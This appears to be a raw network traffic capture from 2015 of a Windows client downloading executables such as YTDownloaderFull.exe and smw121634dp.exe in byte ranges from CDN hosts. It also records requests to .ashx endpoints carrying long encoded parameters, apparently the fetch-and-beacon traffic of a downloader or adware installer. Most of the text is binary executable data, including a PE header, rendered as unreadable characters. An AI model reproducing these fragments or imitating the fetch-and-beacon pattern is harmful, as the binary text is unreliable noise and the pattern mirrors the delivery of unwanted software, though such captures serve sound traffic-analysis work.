j.....kf..&.....#0)0........Or...q(BL..m.d<.......7..3.\..(z:....d.
(.}...K..dR.U..T.KS......g...l...W8...X.b...;......1...L.qv..V~.......
..1)}b=...x3...V.Iv..|...7."..?m.dx.....g...U.>...#..9.-4.....UKD..
.gk...nT..X.Vp.R.............:......|.C2.N...p...S.....jN.T...'N...-.=
sf>}KI}.........4.@g*L.<...Yp.fP.}.#..5.q............whS-f.|..1.
..X|[email protected].....<..,....$.Um... .R......ae..
Ry...!U.g......c.o..........._......./........d.O....>..h.b..{!....
].O.......]-._)....\v..z....pU@&..h..B........\.Gk../.f....>v.3'...
..}.....(W.5...o...XE!L.?..-....R...."..9.k............fi`{.......<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2000000-2249999/5107690
@3........i;.G.L..1..K......>_.QcC.9.......Q......0..r|........j...
...;.w.........z...Vc.Mu.l.'F. ....[....Ie.N)..r.^.ko.}...._..8..~2...
..D..s...}.T......e.z......'/B.L....P.^....UnU{..y.u_........p.${...!.
...v..... .....E.......njL.92..\vm.U5.U..Vx...).D...].$. ..4.j...../.L
....W.....}..H.Y.$5h..........V&.Fd.\.]..;U`....'..!p..-..,. .s.. ..@.
W.5.)A.F.....)X.......... v...|1.d.....N.Ly....e....!{...........1..jJ
.Og..b..X.`~w( mF.......b..; ...O.>.24...-....."a......6=.\...Hr.:.
..VJ.R..3.B......(I1...7.}.4G..,#....k*..e)...7..rV....& .....c..g....
.F.ztJ.....e.........T..`....W .F..W.....v......{.%j..-R..M...Zh._...-
[email protected]. .J.V...).}PM.[..l..Ho..f.....mn..\.6..|
...u:.H ...)..o"6...J....o.j.&....S.G.,al...1...."f.Yd.|(...e.....o..r
...}Y..q....E..9B..5^./........c.UK.....9....[3.8.VvD"...0...2.5...i.'
.Y..YE^....AF..)....C#.5.}t:.n..]e...G}[QN.u...... B.......i....w.HJ5.
L...6.5V..;A.eR....B.Z....[&...Y....2(...I..V....5.F.|.2G.T.U.....R*.7
.......7..b..%D}[email protected]\r:....[...y......%...u."L.K..\.Q..U.d}...:.
.U.vO.o....}.Z.L=F..j ......'........%........8S.{.<Jt...#.j.;.....
H......6;.C|U>.FP.S.7..i.O..G.sx.8..3..M...|...-K?.v.%..i^....W_8..
[email protected].......@...[w..?5x....A)R.>;.S....V...............]..2Q....
.I...Z.K)VI...&...r.!...`..g#.i..M.....C..p.l PH.d.m.H...=k&pN......z.
9.L.c.N.%V.g.....Unqq..Q.j-..F.....5....o.......]`D;\_B...4..o...<.
@.Q..9!.2....%.$......k.....d.........>4>l`t....E.....z(.E<..
...`..SK.!\.I.6H...8..7...G.P..!.}..q...L.. TG...T..u.?...._..3x.;<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2500000-2749999/5107690
w).9..h.1f 3 ..........V..*...G......{....o.[......v.....1.M..r..N..M&
lt;.eS..%..|....c.-%!..t.3.?.....,x.f.!......geb..M.E........#Y...pf.z
..P.6....)%.Y.r.._.=.x............QB&.^.K>0>.R.............w..I.
x..*..G.eU.c'g..L.5..3%..x$1.P3..X...G.4..0..C...QXx..h.,.J.:....Y.?".
%....V..t.).U.&.5.=..X|...f........O&..E..A2..S..F,..@.[.~Y.N.L^....[.
....I.#.8..'G...y..Y.t...<K..D)... dO*......l7?.H.P...?.........M..
;..8./...~.;..*....00d-|t...x....fP....V]Vn.%...U..)...%..)...6.A....B
..A..F......Ub.ph*..=.....m^x..L....A.2.Z'..4.:..9=m1.DZ}n.{d.B....tQQ
..-.3...%$]._.....fO5.<Y.....,.Q!..X$..i..e..g..r.6..............^/
\...k^/R.v..4.x..#$.B..._...@[......._.`x.$...]. r...9./.L............
....;...-.,._.w.,....&....|0....9....Y...8.`..[.4..Jgh..J..u......L. .
.%R..53.......m.....1F..,nr8..I.."..k#%cq.-....(..z..b....J!.....E....
..".pym....n......E..k.(.Y^!1.. ....-)...*.d.....,....\c...8.a........
. oKd^@...M'.Q7.t..f9w...j..zt.......:.6.%3.p.0...?....7..d.$...?.T...
....L......c..~......E...pt..s........s.n.XR...W....B.7=....px.y..G...
.n..B..F6.....;D/.5WZ.....5LQ.h..%.1....y........r.w.9h.......Pz.J2.?.
......(S[......!.....Y#3.#.>...NE. .{.9..C...l.._.bf>..p....Pk..
Gy...kh..*..W....3....t.|..l=o}....!|_.. C..[..T.e..yY.%!...rA....x.]/
[email protected])...........I..x. Q.... h...C.&
lt;&?.'.@_.}5.W..BXV.E.........1.z.........S ..9..H'..................
:...o.....6.M.'m.7D.A...cad....2Q.`.............7U}......d.22E.rD...4)
...iO.. ..W...\.O.....{.......P.(cQv.....%0..)wJ..%Kf..2...{...n.8<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3000000-3249999/5107690
`......tf..Ei......Y...M...f...z.A.].Uk...%.}~.e...X.....TWB.-[E1.H\..
......../..l7.b....3.-)....0.i...-...........'..N`... ..,...I..Q;.J1.&
gt;..1./.v..B.....>..-...S..t.,[email protected].}.....Q..h...=W.......=
`]c%P..d..fFoU..$b...)........O[....I..2...Lj....6?5FF....Z..L..h.....
......wj.N.8..... ...Q.......U.w{tk...., 5.X/..s.`.....(....g..v..a...
.p94.zi...$J..[.o ..yt...P..Z.D...nu.u....Q...6Nu.(..q~...@.....%...#.
m6....} ..J....E.xt.x.`qU...1.;=o...{.i.zd.z......t......A.v.&)&].$...
.cGv,..`.!Uh.*.QD...8.V.C/..3.C.v._B.......~/nj...*j.....e..d...|...N.
.l%.7Sou...I...mR......h.t.........G7.{..6-:L.|....j^...[..F...z.X..T 
......n..3....E........G.l...^!r?....xq.>..y[Am.. .(=}.3H.e.]L..T. 
3 ... j......k.R<l;.. ..-.P....1^..=.y'n...Uh.........|7.....3H....
......|...a......Z.?.v......Y$..D.xj.V[.OY.F."R..}.Ia..)..Zd"J.${*....
.....0..v)[email protected]}(opVkq.Va.<o$......i..M.....!.B=X..L<...2
..0.._...~.~7..6..R.........J[N.0.......E...a.....dGC=.....{.M.3....He
[email protected]...!F...&28H.#6.....*F.[H.........(m...[.I..m... .ta.Y.
.z%.....r`|8 ..}.a.x\f}....so ....s..Y.O.....X..>..].yn..G?...FIg.'
.e.DCp...sE.. ...tIx.>.....BBI.o..I}...}:8..8.8..e..`....&.><
[email protected][email protected]?.H.BM..1Yb..J.~.....@#.... .k..2...peG
........=..(>....A..E<........8...6n..L:*...C...l.$...V]...[....
....D.$.R...{..w..E.N...L.......i.W......}......6......*...|........y.
..;..K....eRSK.<{[email protected]).b)....&..E...&...O.&GB/(.I...d
 .....\>......%.p.......P.....#05KMa.Bh...ZO.4{....\o%........F<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3500000-3749999/5107690
.=.hg......y...Y....-....).oP.. ..G...d.]...\Vf..S..Y....J..k.j..|....
..=...h..Y.Xh..... .../^N.I.W.v..\...&.".>L[.P.j.df .Ls.5..0..`F../
|\.H..(........h....q}-..........g.3n....2......m.M_.U.A.U..O...^998..
.....Is....:[email protected]. ?.:...........1b.tA.5.>.9.
...$..z.....G<.B.":..(...7f.Y.|X.>Y....K..1E.......S.!..|y...3..
.;...p=....I........\...b.!..[Y..Ua.....f%$n...o.../.. ....(Gq.....n.U
.O.......N}.?......k...WZ...F..!.x......(...$.......7.Z...*[L2..whv../
3.J.....-t#&..9...z.....N.|.V...L...;d.~j....ed.4.2...}...NM[Y z.t....
!.ZU.Y..Z.i....:hr..1...........x.(....U...8...O.m....G..,....z.xF..4v
..[....ei...."...rQ.ZF.Fq.C.b!/..p.........Kxk.P.B....lnl.%.K...[....q
:[....D ..s....i..Q.. Z:.:2<....rB...E~m..v.hF..^... tp._c..1o..|..
....B./.l......y..v*.O.P/.<M.O"?.......DX.jIn.8.3.(|....v.)...WF..y
'.U...).]5.}u..zl..................K.7X4.~..b..f...'[./ .......p..=b..
....p;.^.|,3^.uk.....}......................[..8.9......6...G.g.k.iO.R
........6.pI.IT... ...I;K.'8...]....#8.K.Bu.......`......S>..z.d..c
s.u....5(...FH$.f].......[4...}7..y2 ....w....]...By...P..b....WM.Af..
A.....#.g...`.j..)W......_..H......N5..l../..1..........p.......b...K.
.....g../......v..3wG....gY4..1Y.o..Kdu..&.13k...|.....^n....N-..z..?.
e.g....<2.Y....D{..H..M.f.n..S..S..n.z...vw.J......"xu.f..W_..6..*$
......U..7.Ul......9F.f..&i=...o..F..4Q.2l...-..&q....6.T].e...62m..N$
...4.....$S......)..~.7.Y..S.Hx.#......K...R2.BRnn4.g..uV.u&..4.K.....
........t..Z..\[email protected].!.G.!.0K.-..9xg...d&'.......P..........<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4000000-4249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4000000-4249999/5107690
..RSo"..y.......... .1.\..WXe....|[email protected]|0..a........V!T..1.Je
..........y.k....4..EV..........,;......*.[...3.pR.n{.......:...2.EB .
....<..."...*.p.5.u.b.B&....p.h.%..*s^;,...n.J....0..{..DJ...v.T.~.
.e.e..s.9:..&........Qu...cB.....&f.....kt.R#...S.........8..=~..L...S
.. r.$....v....Ume./[email protected].&... ,@.......u3H.......Z..
..;.x..,.......z.-...../5nid.6KE.D..E..i..PA4...L..^e..d.c...n.t,!....
.Q..l .F...9........6u..E..`..%...{{:. .5.......D6.'.syCy .j/.]...A=v.
.gK6...Ak.....b......{........g.......X#V0.."?......x..}p..BG..k.){..&
lt;%I.?3.......i...:.r.....nD{h....2....t./..;.....L.%..UnJ.a.c|......
.SJ...u..h?....]...Cn.Ai....h.iD|..p%Qc..........`...;.%E.)p9... ..V~.
,'...J.l.(...i.e.@ .....1...d.p...CW.*...'f.Ypn[....UP.H.F..u.........
hK..P.a.L.-'..._.x.... "..*[email protected]..:.Q.
.o...T...g|.y..R....3uh..T...'..[E..1h...-...0....aJ.....H.1..H...C~~.
....\.k..|Xa(].~Gm...u... .g...O*.{..=...h...$.5."l.YD.X..o..>}..`.
.0D.h....BQh$v..G.|.......QH..=......f.Kx!..7Z...._.z..........~B...m.
P......=....C.y%...:...;)[email protected].'.8.M0.8.b... .......~.4..A_...p
..X.M.E.....J.}.;."Q%.UG{3A..&.CY.6..F.F..d}q ...c......X..5@S..).....
w ...Y1.P5..Z_.f...C....U...9......v<..5...B.x.vw.....N...:...^8N..
..7...).W..I..G.....Vv2op.'......8.I......-...8.he.,....t............y
.z .....i...S.NMe.$.f.}..o.....Lc..{z..{?-K.5.....(.A....z....*.p.JUH.
.71.!.k..kC.8/..D....Y$... *...............*D.....?...U.]....i2...... 
I...2.(.....#h...........]..._N..>]R....1.W..":.*D.5....M...5.X<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4500000-4749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4500000-4749999/5107690
/h'~..N..h.#..y.d8.3R.|j..;m...]...~}.>Z!@.\.]..BQ.........id9o....
.....Jo....s...4....-..JN  ......z{.R..s\_.*.X..../~.F. ...?Xh7....;.[
\......g{.LI..j.E.>[email protected].,3. ..a.>......I..0
.@..=.l.z.%.wk..f.a6..t.}Ah.F...[{>o...zR4.Z..%.N....\...wLy.q$../.
:..`....H..2.|.!ZX........8OS.K.I..."@..f..(..l{..Q.)..|..z.N(..v.bXZ.
s.. .....\S.T./..q..N..T_].[..Y...K...-...Lv.fX..@uB..:..Z f........H.
......B..y..J..2...U.$`&..h.^.....o..,......,....$e..6N*......e..?.X..
*=vi7..&.v.7..f...Y>n.)../kQTI.....b.. .m.......G .Z..,m........[..
.Z<.....t.Y-...V.?2.,..gS"$.BJ..........r #.....Y.V....R[....h.Q7VU
hg..<.....%,|A.ot9...*..t.Q..........k....~..>..M..;..r.)..m:..@
.n.M...lbZ.... ....pJ...'N(...dV..r......gS........J...K.].%9.7icD...)
.<W.;&~)...[k.v.c6..,.p........l...-2 de...?t....MN oF......6.....~
.3k..e|b....HW H.t4.......[...X.o$."W....I...\4..KK..~,^!..R[.*[......
?.......FW.?,.&o.)4.Z.......Oj...M..a...#..&.....8..2.|h..~......c=...
..??.....^.... .N.k.?X..gxw......Dk .^ .A....!{@....c..Oz.. .j..PIC...
...."rC=.0....ROh..G.,[.M......F...Eh.b..i.hL....L..e.o...G....Uf.n...
TQ^..6=1.h... ..........k>x\.........o.-.g....F.....9]g]...=xD....r
...&IU..2..4..xe...BYE....K...t.N<&....."..`\..)..........b...,..L.
.e...1.^......#iQ......i.a_...\[email protected]=F.&.4..C-k. ..
e..4._}n...S..u.}..y./F..f...zH.................r...g.. .s...4..... Hl
.r>.........4........R.....\.....}<`.l.pl..]O....&......s...0.W.
...z..c......B...]........]..9.LmO,-Wi..4!}n$X.%(..S..820p{.Vd.6..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5000000-5107689

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:43 GMT

Content-Type: application/octet-stream

Content-Length: 107690

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5000000-5107689/5107690
.:.VJ.].....x.H`\.....z..^..l.........lg6.;.I.5...........&...o..6w..e
...3...h...Q.2..&z..........W.G.....o.(._...81]:....p..7j#.]T......>
;...W.-..k..p.:....WO.i....... 0..y.E.1;.....g....j(M(..=wzn..R...o.!.
.....;.#...b...Ed.-i...\....T.$^.{...m.zA...U....(y....f#L..Ac.......^
...;.Km......d....!n.._..b..K.n.D(.U0)...y..R.Y...2..3........I.S.....
fK2...qUP..."..l...........g...$0.].}q.......(q....<..6.R......=..B
)..G............xY[>.k...........q\q<..nk......T.V;[..CU..qG.@:s
...Zd.rXi..|b........{.L.x72..6....T....$ .,..G...b`o.HS,X.v......B.F.
...p....|...E....../......".?/.....<[.........}@.u..Lr= ..t..I.....
)u5Y.r..w......p.<.u9J.N.j...}.&i...q..(q|M..XY0..|/.>..=<...
 .A....w.).&6.-.Dd...!.J....|..BE.9.h...R..Yl.. ...*.....uq&.>7$..9
~.[. ..s.w..h....L...f2x...../6..P.T]|=.}........$.|....UJ..f....I....
.I....~rvq..5....W....G..x.,......07l....N....\..n.$..BY7O.....H..S*..
W.Ap.....u..B.......Zx..j.:...Q.Fh......^....9._..._....O...=..s.2...g
mN*....-.[I.z.9...J'..<...^...E......(.$t.Nqa..w\.S...B..%........t
ZF...g{.......3...!.Oly.t......H..4..M.4C.....s..6..s....JZ....][VJ.'|
f.S..)...R..!.......cl.}L.n.6......w..F.B..\.(..4...\...Z%u..7.....ay(
..0.(.r(.mx..V.M....h....W.P...]..D...T..T..V..{.w...M..X.T&.,......&g
t;P-.Z.&..9..v....*..T...:.....k..pA^e..s.t..4l.... ..-.<pt.\....G.
2.P....ntm...19z.-.){.Q.]I....&d ...V..~......A<...............g]..
.v0.<......)................m.EL....;=K|.UC.H.|.........4..L...83..
..Ew.u.1.:.1%..i....1....^.k.~...`..x..b.O...w*.....m. ./.D....(gW<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 29 Aug 2015 07:03:14 GMT

Content-Range: bytes 250000-499999/520704

Age: 2540

X-Cache: Hit from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: V_r3jESToruazsI3x-84kJKtfpEUIqmlmEr0PRtp0nQs2UFsqvuVKg==
......Y.e...=..G..........<.G......E..8.G..}.........5..G..5T.E....
..]...tt.5..G......]..}..}.....}.;.rWj...P.E.9.t.;.rG.7....j...P.E....
..5..G..5T.E....E..5..G....M.9M.u.9E.t..M....]..E.....h..E.h..E......Y
Yh..E.h..E......YY.E...... ....}..u)....G.....j..'...Y.u..\....}..t.j.
.....Y.......U..j.j..u.........].U...}..u.............t......]..u.j..5
h.G.....E.]..........h`.C.d.5.....D$..l$..l$. [email protected].
.E......E..E.d.......M.d......Y__^[..]Q........U.....S.].VW.E...{..s.3
[email protected][email protected].
.E..C..C..E............@[email protected]{..........M.....~...~h.E..8
csm.u(.=..E..t.h..E..t........t.j..u.....E.....U..M.......E..U.9P.t.h@
gG.V........E..X......tu.f.M..]........^.....tG.!.E........{[email protected]
.................t..O...3.0.K....W..O...3.2.;....E._^[..]..O...3.0.$..
..G..O...3.0......M....I..&......U....([email protected]..}..Wt..u...i..Y..
[email protected]...............................
..............f......f......f......f......f......f..............E.....
[email protected]........
.P.c...Y..u...u..}..t..u...h..Y.M.3._..~....].U...E..H.G.].U...5H.G...
T.E...t.]...u..u..u..u..u.......3.PPPPP.........j... ....t.j.Y.)Vj....
..Vj..s...V........^.U..V.u.WV.....Y.N......u.............N. .........
.@t........".....S3....t..^....t}.F.......N..F.....^.....F......u*....
... ;.t........@;.u.W.o...Y..u.V.....Y.F.....tz.V... ..M..B....F.H.F..
.~.QRW..#........G.. .N..h...t....t.................h.G.....hG..A.<<< skipped >>>

GET /12466.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqcnIzPjk7XGtW1B5cJyD8WHLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:37 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /12466.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqfhTy6irisLyMLwVoAmU3rnUzRVzAnl uFqmlgchhBdgwSPF2iAJtcmUJIT4CY/7AXh9X2HG3hgOnl431dc355ZX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /12466.ashx?e=k64GogClQtV0cn8dtkQxkPtwZYyWBm3A/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYjkTFPZ1 JDTyBfkdHFoABciDxPRY4o5upR90anDedSCd9HiXvVRh4g0C52NwzQxay5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:41 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:41 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /t.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/jJX2BNWr5ZmwkqgaQEwGAs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qko863p80c-mzxspesu.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

GET /t.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/jJX2BNWr5ZmwkqgaQEwGAs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qko863p80c-mzxspesu.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qko863p80c-mzxspesu.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:39 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhskHTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:39 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /smw121634dp.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 09:28:55 GMT

Content-Range: bytes 0-249999/3359008

X-Cache: RefreshHit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 54cndzdar9pouT6c-jA8F1urRi91dnKS0CZgNwdZfZy4XTir7Exl-g==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
........a.4......................................s..........`B........
... 3.(............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected]...`[email protected]...`B.......D...v
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
